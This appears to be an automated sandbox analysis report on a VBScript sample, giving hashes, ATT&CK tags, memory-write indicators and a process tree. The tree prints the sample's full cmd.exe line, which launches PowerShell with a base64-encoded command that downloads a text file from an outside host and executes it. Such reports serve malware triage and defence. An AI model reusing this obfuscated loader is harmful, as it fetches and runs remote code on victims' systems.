29bd0ab3b7cb939a7def1c4e4bb78c3c9d7e19d580e6292b155e89b13820309f

Analysis

Target

P48274Q89.vbs
Size

872B
MD5

028b34eb17d379cf3688e72225cd95da
SHA1

851db5268715999fc8db2d6292096d19e3830d3b
SHA256

29bd0ab3b7cb939a7def1c4e4bb78c3c9d7e19d580e6292b155e89b13820309f
SHA512

8e1be3d7de63e20e5d8737486b123dff598894bab17f15e69e2ac0f648e4d52b81e261aff26657fc4533ed20845d921e8aec1df2333fe8eeb1ab6d0763975405

Score

3^/10

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Suspicious use of WriteProcessMemory 12 IoCs

Processes:

WScript.execmd.execmd.exe

description	pid	process	target process
PID 1672 wrote to memory of 660	1672	WScript.exe	cmd.exe
PID 1672 wrote to memory of 660	1672	WScript.exe	cmd.exe
PID 1672 wrote to memory of 660	1672	WScript.exe	cmd.exe
PID 660 wrote to memory of 756	660	cmd.exe	cmd.exe
PID 660 wrote to memory of 756	660	cmd.exe	cmd.exe
PID 660 wrote to memory of 756	660	cmd.exe	cmd.exe
PID 756 wrote to memory of 1496	756	cmd.exe	cmd.exe
PID 756 wrote to memory of 1496	756	cmd.exe	cmd.exe
PID 756 wrote to memory of 1496	756	cmd.exe	cmd.exe
PID 756 wrote to memory of 564	756	cmd.exe	findstr.exe
PID 756 wrote to memory of 564	756	cmd.exe	findstr.exe
PID 756 wrote to memory of 564	756	cmd.exe	findstr.exe

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\P48274Q89.vbs"
1⤵
- Suspicious use of WriteProcessMemory
PID:1672

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c FOR /F "tokens=11 delims=s\" %g IN ('set^|findstr PSM') do %g -e JAB3AGUAYgByAGUAcQAgAD0AIABbAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBSAGUAcQB1AGUAcwB0AF0AOgA6AEMAcgBlAGEAdABlACgAJwBoAHQAdABwAHMAOgAvAC8AagB1AHMAdABpAGMAZQBtAG8AdQBuAHQALgB4AHkAegAvAHMAZQBlAC8AUABlAC0AQwBvAGQAZQAuAHQAeAB0ACcAKQA7ACQAcgBlAHMAcAA9ACQAdwBlAGIAcgBlAHEALgBHAGUAdABSAGUAcwBwAG8AbgBzAGUAKAApADsAJAByAGUAcwBwAHMAdAByAGUAYQBtAD0AJAByAGUAcwBwAC4ARwBlAHQAUgBlAHMAcABvAG4AcwBlAFMAdAByAGUAYQBtACgAKQA7ACQAcgBlAGEAZABlAHIAPQBbAFMAeQBzAHQAZQBtAC4ASQBPAC4AUwB0AHIAZQBhAG0AUgBlAGEAZABlAHIAXQA6ADoAbgBlAHcAKAAkAHIAZQBzAHAAcwB0AHIAZQBhAG0AKQA7ACQAYwBvAG4AdABlAG4AdAA9ACQAcgBlAGEAZABlAHIALgBSAGUAYQBkAFQAbwBFAG4AZAAoACkAOwAkAGMAbwBuAHQAZQBuAHQAIAB8ACAAaQBlAHgA
2⤵
- Suspicious use of WriteProcessMemory
PID:660

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c set|findstr PSM
3⤵
- Suspicious use of WriteProcessMemory
PID:756

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" set"
4⤵
PID:1496

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

memory/564-58-0x0000000000000000-mapping.dmp

Download
memory/660-55-0x0000000000000000-mapping.dmp

Download
memory/756-56-0x0000000000000000-mapping.dmp

Download
memory/1496-57-0x0000000000000000-mapping.dmp

Download
memory/1672-54-0x000007FEFBAD1000-0x000007FEFBAD3000-memory.dmp

Filesize
8KB

Download